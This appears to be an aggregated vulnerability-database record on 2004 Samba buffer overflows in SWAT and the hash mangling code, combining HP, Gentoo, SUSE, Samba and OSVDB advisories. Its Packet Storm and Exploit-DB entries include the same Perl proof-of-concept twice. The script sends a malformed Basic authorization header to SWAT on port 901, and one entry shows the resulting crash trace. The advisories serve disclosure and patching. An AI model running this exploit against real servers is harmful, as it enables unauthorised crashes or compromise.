0 HP-UX CIFS Server potential remote root access\r\n\r\n\r\n -----------------------------------------------------------------\r\nNOTICE:\r\n There are no restrictions for distribution of this Bulletin\r\n provided that it remains complete and intact.\r\n\r\n The information in this Security bulletin should be acted upon\r\n as soon as possible.\r\n\r\nINITIAL RELEASE: 26 July 2004\r\n\r\n\r\n\r\nPOTENTIAL SECURITY IMPACT: remote root access\r\n\r\nSOURCE: HEWLETT-PACKARD COMPANY\r\nHP Software Security Response Team\r\n\r\nREFERENCES: CAN-2004-0686\r\n\r\nVULNERABILITY SUMMARY:\r\nA potential security vulnerability has been identified with HP-UX\r\nrunning the CIFS Server. This buffer overflow could potentially\r\nbe exploited remotely to gain root access.\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.00, B.11.11, B.11.22, B.11.23.\r\nBACKGROUND:\r\n\r\nAFFECTED VERSIONS\r\n\r\nNote: To determine if a system has an affected version,\r\n search the output of "swlist -a revision -l fileset"\r\n for an affected fileset. Then determine if the\r\n recommended patch or update is installed.\r\n\r\nHP-UX B.11.23\r\nHP-UX B.11.22\r\nHP-UX B.11.11\r\nHP-UX B.11.00\r\n=============\r\nFor revision A.01.11.01 and previous:\r\nCIFS-Server\r\naction: Please see the Resolution section.\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nNote: The HP CIFS Server versions do not map directly to\r\n original Samba versions. The what(1) output will show\r\n the HP version string, for example: A.01.11.02. 
Samba\r\n commands such as "smbd -V" or "smbstatus" will report the\r\n underlying base Samba version, for example: 2.2.10.\r\n\r\nNote: The HP CIFS Server versions A.01.11.02 and previous are\r\n not affected by the vulnerability reported in CAN-2004-0600.\r\n\r\nRESOLUTION:\r\nUntil an update is available the potential vulnerability can\r\nbe avoided by setting "mangling method = hash2" or\r\n"mangled names = no" in smb.conf.\r\n\r\nNote: CIFS Server installations requiring the hash mangling\r\n method must evaluate the impact of converting to the\r\n hash2 mangling method.\r\n\r\n\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nUntil a product update is available, modify smb.conf as described\r\nin the Resolution section.\r\n\r\nBULLETIN REVISION HISTORY:\r\nRevision 0 - 26 July 2004\r\n Initial release.\r\n\r\n\r\n* The software product category that this Security Bulletin\r\n relates to is represented by the 5th and 6th characters of the\r\n Bulletin number: GN=General, MA=Management Agents, MI=Misc.\r\n 3rd party, MP=HP-MPE/iX, NS=HP NonStop Servers, OV=HP OpenVMS,\r\n PI=HP Printing & Imaging, ST=HP Storage, TU=HP Tru64 UNIX,\r\n TL=Trusted Linux, UX=HP-UX, VV=Virtual Vault\r\n\r\n\r\nSUPPORT: For further information, contact HP Services support\r\n channel.\r\n\r\nSUBSCRIBE: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode\r\n=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page:\r\nDriver and Support Alerts/Notifications Sign-up: Product Selection\r\nUnder Step1: your products\r\n1. Select product category:\r\n - a minimum of servers must be selected.\r\n2. Select product family or search:\r\n - a minimum of one product must be selected.\r\n3. 
Add a product:\r\n - a minimum of one product must be added.\r\nIn Step 2: your operating system(s)\r\n - check ALL operating systems for which alerts are required.\r\nComplete the form and Save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page Subscriber's choice for Business: sign-in.\r\nOn the Web page: Subscriber's Choice: your profile summary\r\n- - use Edit Profile to update appropriate sections.\r\n\r\nNote: In addition to the individual alerts/notifications for the\r\nselected operating systems/products, subscribers will\r\nautomatically receive one copy of alerts for non-operating system\r\ncategories (i.e., a subscriber who signs up for all six operating\r\nsystem alerts will only receive one copy of all the non-operating\r\nsystem alerts).\r\n\r\nHP-UX SPECIFIC SECURITY BULLETINS*:\r\nTo review previously published Security Bulletins for HP-UX:\r\n http://itrc.hp.com/cki/bin/doc.pl/screen=ckiSecurityBulletin\r\n\r\nSecurity Patch Check revision B.02.00 analyzes all HP-issued\r\nsecurity bulletins to give you a subset of recommended actions\r\nthat potentially affect your particular HP-UX system.\r\nFor more information:\r\n<http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/\r\n displayProductInfo.pl?productNumber=B6834AA>\r\n\r\n\r\nREPORT: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To obtain the security-alert PGP key please send an\r\ne-mail message to security-alert@hp.com with the Subject of\r\n'get key' (no quotes).\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. 
HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently,\r\nHP will not be responsible for any damages resulting from user's\r\nuse or disregard of the information provided in this Bulletin.\r\nTo the extent permitted by law, HP disclaims all warranties,\r\neither express or implied, including the warranties of\r\nmerchantability and fitness for a particular purpose, title\r\nand non-infringement."\r\n\r\n\r\n(c)Copyright 2004 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided "as is" without warranty of any kind. To the\r\nextent permitted by law, neither HP or its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. 
Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.0.2\r\n\r\niQA/AwUBQQZAC+AfOvwtKn1ZEQLHWgCgnK6lo0FnLfC1FrfJqZ4fBsSL4N8An3fY\r\n9CxSYZ5TdGSIiXshpd6SQLPw\r\n=JjWX\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2004-07-28T00:00:00", "published": "2004-07-28T00:00:00", "id": "SECURITYVULNS:DOC:6545", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6545", "title": "[security bulletin] SSRT4782 rev. 0 HP-UX CIFS Server potential remote root access", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:11", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "### Background\n\nSamba is a package which allows *nix systems to act as file servers for Windows computers. It also allows *nix systems to mount shares exported by a Samba/CIFS/Windows server. The Samba Web Administration Tool (SWAT) is a web-based configuration tool part of the Samba package. \n\n### Description\n\nEvgeny Demidov found a buffer overflow in SWAT, located in the base64 data decoder used to handle HTTP basic authentication (CAN-2004-0600). The same flaw is present in the code used to handle the sambaMungedDial attribute value, when using the ldapsam passdb backend. Another buffer overflow was found in the code used to support the 'mangling method = hash' smb.conf option (CAN-2004-0686). Note that the default Samba value for this option is 'mangling method = hash2' which is not vulnerable. \n\n### Impact\n\nThe SWAT authentication overflow could be exploited to execute arbitrary code with the rights of the Samba daemon process. The overflow in the sambaMungedDial handling code is not thought to be exploitable. 
The buffer overflow in 'mangling method = hash' code could also be used to execute arbitrary code on vulnerable configurations. \n\n### Workaround\n\nUsers disabling SWAT, not using ldapsam passdb backends and not using the 'mangling method = hash' option are not vulnerable. \n\n### Resolution\n\nAll Samba users should upgrade to the latest version: \n \n \n # emerge sync\n \n # emerge -pv \">=net-fs/samba-3.0.5\"\n # emerge \">=net-fs/samba-3.0.5\"", "edition": 1, "modified": "2004-07-29T00:00:00", "published": "2004-07-29T00:00:00", "id": "GLSA-200407-21", "href": "https://security.gentoo.org/glsa/200407-21", "type": "gentoo", "title": "Samba: Multiple buffer overflows", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:13:32", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686", "CVE-2004-0398", "CVE-2004-0179", "CVE-2004-0600"], "description": "The Samba Web Administration Tool (SWAT) was found vulnerable to a buffer overflow in its base64 code. This buffer overflow can possibly be exploited remotely before any authentication took place to execute arbitrary code. The same piece of vulnerable code was also used in ldapsam passdb and in the ntlm_auth tool. This vulnerability only exists on Samba 3.0.2 to 3.0.4.", "edition": 1, "modified": "2004-07-23T11:20:42", "published": "2004-07-23T11:20:42", "id": "SUSE-SA:2004:022", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-07/msg00005.html", "title": "remote root compromise in samba", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "samba": [{"lastseen": "2019-05-29T17:19:12", "bulletinFamily": "software", "cvelist": ["CVE-2004-0686"], "description": "A buffer overrun has been located in the code used to support the 'mangling method = hash' smb.conf option. 
Please be aware that the default setting for this parameter is 'mangling method = hash2' and therefore not vulnerable.\nAffected Samba 3 installations can avoid this possible security bug by using the default hash2 mangling method. Server installations requiring the hash mangling method are encouraged to upgrade to Samba 3.0.5.\n #### Protecting Unpatched Servers\nThe Samba Team always encourages users to run the latest stable release as a defense against attacks. However, under certain circumstances it may not be possible to immediately upgrade important installations. In such cases, administrators should read the \"Server Security\" documentation found at http://www.samba.org/samba/docs/server_security.html.", "edition": 4, "modified": "2004-07-22T00:00:00", "published": "2004-07-22T00:00:00", "id": "SAMBA:CVE-2004-0686", "href": "https://www.samba.org/samba/security/CVE-2004-0686.html", "title": "Potential Buffer Overrun in smbd ", "type": "samba", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T17:19:12", "bulletinFamily": "software", "cvelist": ["CVE-2004-0600"], "description": "The internal routine used by the Samba Web Administration Tool (SWAT v3.0.2 and later) to decode the base64 data during HTTP basic authentication is subject to a buffer overrun caused by an invalid base64 character. It is recommended that all Samba v3.0.2 or later installations running SWAT either (a) upgrade to v3.0.5, or (b) disable the swat administration service as a temporary workaround.\nThis same code is used internally to decode the sambaMungedDial attribute value when using the ldapsam passdb backend. 
While we do not believe that the base64 decoding routines used by the ldapsam passdb backend can be exploited, sites using an LDAP directory service with Samba are strongly encouraged to verify that the DIT only allows write access to sambaSamAccount attributes by a sufficiently authorized user.", "edition": 4, "modified": "2004-07-22T00:00:00", "published": "2004-07-22T00:00:00", "id": "SAMBA:CVE-2004-0600", "href": "https://www.samba.org/samba/security/CVE-2004-0600.html", "title": "Potential Buffer Overrun in SWAT ", "type": "samba", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0686"], "edition": 1, "description": "## Vulnerability Description\nSamba contains a flaw related to the \"mangling method = hash\" option that may allow an attacker to cause a buffer overflow. No further details have been provided.\n## Solution Description\nUpgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSamba contains a flaw related to the \"mangling method = hash\" option that may allow an attacker to cause a buffer overflow. 
No further details have been provided.\n## References:\nVendor URL: http://www.samba.org/\n[Vendor Specific Advisory URL](http://www.netwosix.org/adv15.html)\n[Vendor Specific Advisory URL](http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01062)\n[Vendor Specific Advisory URL](http://www.openpkg.org/security/OpenPKG-SA-2004.033-samba.txt)\n[Vendor Specific Advisory URL](http://www.tinysofa.org/support/errata/2004/014.html)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_22_samba.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000851)\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-21.xml)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-57664-1&searchclause=)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000854)\n[Secunia Advisory ID:12130](https://secuniaresearch.flexerasoftware.com/advisories/12130/)\n[Secunia Advisory ID:12972](https://secuniaresearch.flexerasoftware.com/advisories/12972/)\n[Secunia Advisory ID:12168](https://secuniaresearch.flexerasoftware.com/advisories/12168/)\n[Related OSVDB ID: 8190](https://vulners.com/osvdb/OSVDB:8190)\nRedHat RHSA: RHSA-2004:259-23\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:071\nOther Advisory URL: http://rhn.redhat.com/errata/RHSA-2004-404.html\nOther Advisory URL: http://www.samba.org/samba/whatsnew/samba-3.0.5.html\nOther Advisory URL: http://www.trustix.net/errata/2004/0039/\n[Nessus Plugin ID:13846](https://vulners.com/search?query=pluginID:13846)\n[Nessus Plugin ID:13657](https://vulners.com/search?query=pluginID:13657)\nISS X-Force ID: 16786\n[CVE-2004-0686](https://vulners.com/cve/CVE-2004-0686)\n", "modified": "2004-07-22T03:44:32", "published": "2004-07-22T03:44:32", "href": "https://vulners.com/osvdb/OSVDB:8191", "id": "OSVDB:8191", "type": "osvdb", "title": 
"Samba Mangling Method Hash Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0600"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Samba. The Samba Web Administration Tool (SWAT) fails to perform proper bounds checking when decoding base64 data during HTTP basic authentication resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in Samba. The Samba Web Administration Tool (SWAT) fails to perform proper bounds checking when decoding base64 data during HTTP basic authentication resulting in a buffer overflow. 
With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.samba.org/\n[Vendor Specific Advisory URL](http://www.netwosix.org/adv15.html)\n[Vendor Specific Advisory URL](http://www.openpkg.org/security/OpenPKG-SA-2004.033-samba.txt)\n[Vendor Specific Advisory URL](http://www.tinysofa.org/support/errata/2004/014.html)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_22_samba.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000851)\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-21.xml)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000854)\n[Secunia Advisory ID:12130](https://secuniaresearch.flexerasoftware.com/advisories/12130/)\n[Secunia Advisory ID:12087](https://secuniaresearch.flexerasoftware.com/advisories/12087/)\n[Secunia Advisory ID:12454](https://secuniaresearch.flexerasoftware.com/advisories/12454/)\n[Related OSVDB ID: 8191](https://vulners.com/osvdb/OSVDB:8191)\nRedHat RHSA: RHSA-2004:259-23\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:071\nOther Advisory URL: http://www.samba.org/samba/whatsnew/samba-3.0.5.html\nOther Advisory URL: http://www.trustix.net/errata/2004/0039/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0249.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0258.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0256.html\n[CVE-2004-0600](https://vulners.com/cve/CVE-2004-0600)\n", "modified": "2004-07-22T03:44:32", "published": "2004-07-22T03:44:32", "href": "https://vulners.com/osvdb/OSVDB:8190", "id": "OSVDB:8190", "type": "osvdb", "title": "Samba SWAT HTTP Basic Auth base64 Overflow", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:59", "description": "", "published": "2004-07-23T00:00:00", "type": "packetstorm", "title": "sambaPoC.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0600"], "modified": "2004-07-23T00:00:00", "id": "PACKETSTORM:33855", "href": "https://packetstormsecurity.com/files/33855/sambaPoC.txt.html", "sourceData": "`Hi, \n \nThe following is a brief proof of concept exploit code for the vulnerability \nmentioned in \"Evgeny Demidov\" <demidov@gleg.net>'s advisory: Samba 3.x swat \npreauthentication buffer overflow \n \nRunning the perl script against a vulnerable SWAT server will cause: \nProgram received signal SIGSEGV, Segmentation fault. \n[Switching to process 30853] \n0x410957af in memcpy () from /lib/tls/libc.so.6 \n(gdb) bt \n#0 0x410957af in memcpy () from /lib/tls/libc.so.6 \n#1 0xbffff340 in ?? () \n#2 0x00000001 in ?? () \n#3 0x080e34e7 in ?? () \n#4 0xbffff5e5 in ?? () \n#5 0x082919a0 in ?? () \n#6 0xffffffff in ?? () \n#7 0x080e08f0 in ?? () \n#8 0x082919a0 in ?? () \n#9 0xffffffff in ?? () \n#10 0x080e7090 in ?? () \n#11 0x0c0b8fae in ?? () \n#12 0xbffff5e5 in ?? () \n#13 0x00000000 in ?? () \n#14 0xbffff5a8 in ?? () \n#15 0x0806c97d in ?? () \n#16 0xbffff5e5 in ?? () \n#17 0x0815fd76 in ?? () \n#18 0x00000006 in ?? () \n#19 0x41150ebc in ?? () from /lib/tls/libc.so.6 \n#20 0x081c8480 in ?? () \n#21 0x4108ae2f in _IO_list_resetlock () from /lib/tls/libc.so.6 \n#22 0xbffff3b4 in ?? () \n#23 0x081c8480 in ?? () \n#24 0x081c887f in ?? () \n#25 0x00000000 in ?? () \n#26 0x00000000 in ?? () \n#27 0xbffff3b4 in ?? () \n#28 0xbffff4cc in ?? () \n#29 0x00000400 in ?? () \n#30 0x4108dda4 in mallopt () from /lib/tls/libc.so.6 \n#31 0xbffff3b4 in ?? () \n#32 0x08162fd9 in ?? () \n#33 0x41151888 in __after_morecore_hook () from /lib/tls/libc.so.6 \n#34 0x4108e3c8 in mallopt () from /lib/tls/libc.so.6 \n#35 0x00000000 in ?? 
() \n \n \nExploit: \n#!/usr/bin/perl \n# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow \n# Created by Noam Rathaus of Beyond Security Ltd. \n# \n \nuse IO::Socket; \nuse strict; \n \nmy $host = $ARGV[0]; \n \nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host, \nPeerPort => \"901\" ); \n \nunless ($remote) { die \"cannot connect to http daemon on $host\" } \n \nprint \"connected\\n\"; \n \n$remote->autoflush(1); \n \nmy $http = \"GET / HTTP/1.1\\r \nHost: $host:901\\r \nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 \nFirefox/0.9.1\\r \nAccept: text/xml\\r \nAccept-Language: en-us,en;q=0.5\\r \nAccept-Encoding: gzip,deflate\\r \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r \nKeep-Alive: 300\\r \nConnection: keep-alive\\r \nAuthorization: Basic =\\r \n\\r \n\"; \n \nprint \"HTTP: [$http]\\n\"; \nprint $remote $http; \nsleep(1); \nprint \"Sent\\n\"; \n \nwhile (<$remote>) \n{ \n print $_; \n} \nprint \"\\n\"; \n \nclose $remote; \n \n-- \nThanks \nNoam Rathaus \nCTO \nBeyond Security Ltd. \n \nJoin the SecuriTeam community on Orkut: \nhttp://www.orkut.com/Community.aspx?cmm=44441 \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/33855/sambaPoC.txt"}], "exploitdb": [{"lastseen": "2016-01-31T12:15:08", "description": "Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit. CVE-2004-0600. 
Remote exploit for linux platform", "published": "2004-07-22T00:00:00", "type": "exploitdb", "title": "Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0600"], "modified": "2004-07-22T00:00:00", "id": "EDB-ID:364", "href": "https://www.exploit-db.com/exploits/364/", "sourceData": "#!/usr/bin/perl\r\n# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow\r\n# Created by Noam Rathaus of Beyond Security Ltd.\r\n#\r\n\r\nuse IO::Socket;\r\nuse strict;\r\n\r\nmy $host = $ARGV[0];\r\n\r\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host, \r\nPeerPort => \"901\" );\r\n\r\nunless ($remote) { die \"cannot connect to http daemon on $host\" }\r\n\r\nprint \"connected\\n\";\r\n\r\n$remote->autoflush(1);\r\n\r\nmy $http = \"GET / HTTP/1.1\\r\r\nHost: $host:901\\r\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 \r\nFirefox/0.9.1\\r\r\nAccept: text/xml\\r\r\nAccept-Language: en-us,en;q=0.5\\r\r\nAccept-Encoding: gzip,deflate\\r\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\r\nKeep-Alive: 300\\r\r\nConnection: keep-alive\\r\r\nAuthorization: Basic =\\r\r\n\\r\r\n\";\r\n\r\nprint \"HTTP: [$http]\\n\";\r\nprint $remote $http;\r\nsleep(1);\r\nprint \"Sent\\n\";\r\n\r\nwhile (<$remote>)\r\n{\r\n\u00c2\u00a0print $_;\r\n}\r\nprint \"\\n\";\r\n\r\nclose $remote;\r\n\r\n# milw0rm.com [2004-07-22]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/364/"}]}